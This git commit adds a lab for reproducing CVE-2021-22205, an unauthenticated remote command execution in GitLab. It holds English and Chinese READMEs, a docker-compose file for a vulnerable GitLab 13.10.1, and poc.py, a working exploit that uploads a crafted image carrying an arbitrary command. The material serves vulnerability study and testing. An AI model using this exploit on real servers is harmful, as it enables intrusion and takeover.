first commit

gitlab/CVE-2021-22205/README.md

@@ -0,0 +1,38 @@
+# GitLab Pre-Auth Remote Command Execution (CVE-2021-22205)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GitLab is a web-based DevOps lifecycle tool that provides a Git repository manager providing wiki, issue-tracking and continuous integration and deployment pipeline features.
+
+An issue has been discovered in GitLab CE/EE affecting the versions starting from 11.9. GitLab was not properly validating image files that is passed to a file parser which resulted in an unauthenticated remote command execution.
+
+References:
+
+- https://hackerone.com/reports/1154542
+- https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
+- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
+- https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml
+
+## Vulnerable environment
+
+Execute following command to start a GitLab Community Server 13.10.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:8080` to see the website.
+
+## Exploit
+
+The api endpoint `/uploads/user` is an unauthenticated interface. Attack the server through the [poc.py](poc.py):
+
+```
+python poc.py http://your-ip:8080 "touch /tmp/success"
+```
+
+![](1.png)
+
+`touch /tmp/success` has been executed successfully:
+
+![](2.png)

gitlab/CVE-2021-22205/README.zh-cn.md

@@ -0,0 +1,34 @@
+# GitLab 远程命令执行漏洞（CVE-2021-22205）
+
+GitLab是一款Ruby开发的Git项目管理平台。在11.9以后的GitLab中，因为使用了图片处理工具ExifTool而受到漏洞[CVE-2021-22204](https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html)的影响，攻击者可以通过一个未授权的接口上传一张恶意构造的图片，进而在GitLab服务器上执行任意命令。
+
+参考链接：
+
+- https://hackerone.com/reports/1154542
+- https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
+- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
+- https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml
+
+## 漏洞环境
+
+执行如下命令启动一个GitLab 13.10.1版本服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看到GitLab的登录页面。
+
+## 漏洞复现
+
+GitLab的/uploads/user接口可以上传图片且无需认证，利用[poc.py](poc.py)脚本来测试这个漏洞：
+
+```
+python poc.py http://your-ip:8080 "touch /tmp/success"
+```
+
+![](1.png)
+
+进入容器内，可见`touch /tmp/success`已成功执行：
+
+![](2.png)

gitlab/CVE-2021-22205/docker-compose.yml

@@ -0,0 +1,49 @@
+version: '2.3'
+
+services:
+  redis:
+    image: redis:5.0.9-alpine
+
+  postgresql:
+    image: postgres:12-alpine
+    environment:
+    - POSTGRES_USER=gitlab
+    - POSTGRES_PASSWORD=password
+    - POSTGRES_DB=gitlabhq_production
+    - DB_EXTENSION=pg_trgm,btree_gist
+
+  gitlab:
+    image: vulhub/gitlab:13.10.1
+    depends_on:
+    - redis
+    - postgresql
+    ports:
+    - "8080:80"
+    - "10022:22"
+    environment:
+    - DEBUG=false
+
+    - DB_ADAPTER=postgresql
+    - DB_HOST=postgresql
+    - DB_PORT=5432
+    - DB_USER=gitlab
+    - DB_PASS=password
+    - DB_NAME=gitlabhq_production
+
+    - REDIS_HOST=redis
+    - REDIS_PORT=6379
+
+    - GITLAB_HTTPS=false
+    - SSL_SELF_SIGNED=false
+
+    - GITLAB_HOST=localhost
+    - GITLAB_PORT=8080
+    - GITLAB_SSH_PORT=10022
+    - GITLAB_RELATIVE_URL_ROOT=
+    - GITLAB_SECRETS_DB_KEY_BASE=long-long-long-long-long-long-secret-key-is-here1
+    - GITLAB_SECRETS_SECRET_KEY_BASE=long-long-long-long-long-long-secret-key-is-here2
+    - GITLAB_SECRETS_OTP_KEY_BASE=long-long-long-long-long-long-secret-key-is-her3
+
+    - TZ=Asia/Kolkata
+    - GITLAB_TIMEZONE=Kolkata
+    - GITLAB_ROOT_PASSWORD=vulhub123456

gitlab/CVE-2021-22205/poc.py

@@ -0,0 +1,36 @@
+import sys
+import re
+import requests
+
+
+target = sys.argv[1]
+command = sys.argv[2]
+session = requests.session()
+CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />')
+
+def get_payload(command):
+    rce_payload = b'\x41\x54\x26\x54\x46\x4f\x52\x4d'
+    rce_payload += (len(command) + 0x55).to_bytes(length=4, byteorder='big', signed=True)
+    rce_payload += b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61'
+    rce_payload += (len(command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True)
+    rce_payload += b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b'
+    rce_payload += command.encode()
+    rce_payload += b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a'
+    return rce_payload
+
+def csrf_token():
+    response = session.get(f'{target}/users/sign_in', headers={'Origin': target})
+    g = CSRF_PATTERN.search(response.content)
+    assert g, 'No CSRF Token found'
+
+    return g.group(1).decode()
+
+
+def exploit():
+    files = [('file', ('test.jpg', get_payload(command), 'image/jpeg'))]
+    session.post(f'{target}/uploads/user', files=files, headers={'X-CSRF-Token': csrf_token()})
+
+
+if __name__ == '__main__':
+    exploit()
+    print('finish test')